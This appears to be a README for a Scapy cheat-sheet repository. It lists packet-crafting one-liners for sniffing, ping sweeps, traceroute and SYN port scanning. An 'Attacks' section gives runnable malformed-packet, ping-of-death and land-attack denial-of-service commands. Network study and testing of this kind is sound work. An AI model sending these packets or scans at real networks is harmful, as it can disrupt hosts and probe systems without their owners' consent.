uberscapy

Scapy docs, examples, scripts and other stuff

WARNiNG: NOT ALL SCRIPTS ARE TESTED! CHECK BEFORE RUNNING!

docs - diffrent scapy docs examples - examples for official Scapy usage and more

Tutorial

Official Scapy usage tutorial is located here

Simple examples

Sniff

Sniffing on eth0:

    sniff(iface="eth0", prn=lambda x: x.summary())
    sniff(iface="eth0", prn=lambda x: x.show())

Formated sniff output

    pkts = sniff(prn=lambda x:x.sprintf("{IP:%IP.src% -> %IP.dst%\n}{Raw:%Raw.load%\n}"))

Identify ports

    a=sniff(filter="tcp and ( port 25 or port 110 )", \
    prn=lambda x: x.sprintf("%IP.src%:%TCP.sport% -> %IP.dst%:%TCP.dport%  %2s,TCP.flags% : %TCP.payload%"))

Ping

TCP ping:

	srloop(IP(dst="www.google.com/30")/TCP())

TCP ping:

    ans,unans = sr( IP(dst="192.168.1.*")/TCP(dport=80,flags="S") )
	ans.summary( lambda(s,r) : r.sprintf("%IP.src% conteasta") )

UDP ping

    ans,unans = sr( IP(dst="192.168.1.1-10")/UDP(dport=0) )
	ans.summary( lambda(s,r) : r.sprintf("%IP.src% contesta en udp") )

ARP ping manual:

	ans,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.1.0/24"),timeout=2)
	ans.summary(lambda (s,r): r.sprintf("%Ether.src% %ARP.psrc%") )

ARP ping built in:

	arping("192.168.1.1")

Traceroute:

	traceroute(["www.google.com","www.ust.cl","www.terra.cl","www.microsoft.com"],maxttl=20)
	result, unans=_
	result.show()
	# save output
	result.graph(type="ps", target="|lp")
	result.graph(target="> grafico.svg")

Advaced traceroute + DNS

	ans,unans = sr(IP(dst="terra.cl",ttl=(1,10))/TCP(dport=53,flags="S"))
	ans.summary( lambda(s,r) : r.sprintf("%IP.src%\t{ICMP:%ICMP.type%}\t{TCP:%TCP.flags%}"))

Dump traceroute output:

	res,unans = traceroute(["www.ust.cl","www.santotomas.cl"],dport=[80,443],maxttl=20,retry=-2)
	res.graph(type="ps", target="|lp")
	res.graph(target="> grafico.svg")

Port scanner:

	res,unans = sr( IP(dst="target")/TCP(flags="S", dport=(1,1024)) )
	res.nsummary( lfilter=lambda (s,r): (r.haslayer(TCP) and (r.getlayer(TCP).flags & 2)) )

OS fingerprint:

	ans,unans = srloop(IP(dst="192.168.1.1")/TCP(dport=80,flags="S"))

Attacks

Malformed packets:

    send(IP(dst="192.168.1.1", ihl=2, version=3)/ICMP())

Ping of death:

    send( fragment(IP(dst="192.168.1.1")/ICMP()/("X"*60000)) )

Land attack (windows):

    send(IP(src=target,dst=target)/TCP(sport=135,dport=135))

DHCP discovery:

	conf.checkIPaddr = False
	fam,hw = get_if_raw_hwaddr(conf.iface)
	dhcp_discover = Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=hw)/DHCP(options=[("message-type","discover"),"end"])
	ans, unans = srp(dhcp_discover, multi=True)
	ans.display()

Links

http://stackoverflow.com/questions/10818661/scapy-retrieving-rssi-from-wifi-packets

http://hackoftheday.securitytube.net/2013/04/wi-fi-ssid-sniffer-in-12-lines-of.html

http://hackoftheday.securitytube.net/2013/03/wi-fi-sniffer-in-10-lines-of-python.html

http://scholarworks.sjsu.edu/cgi/viewcontent.cgi?article=1191&context=etd_projects

http://pen-testing.sans.org/blog/2011/10/13/special-request-wireless-client-sniffing-with-scapy

http://raidersec.blogspot.com/2013/01/wireless-deauth-attack-using-aireplay.html

http://www.secdev.org/projects/scapy/portability.html

0x90/uberscapy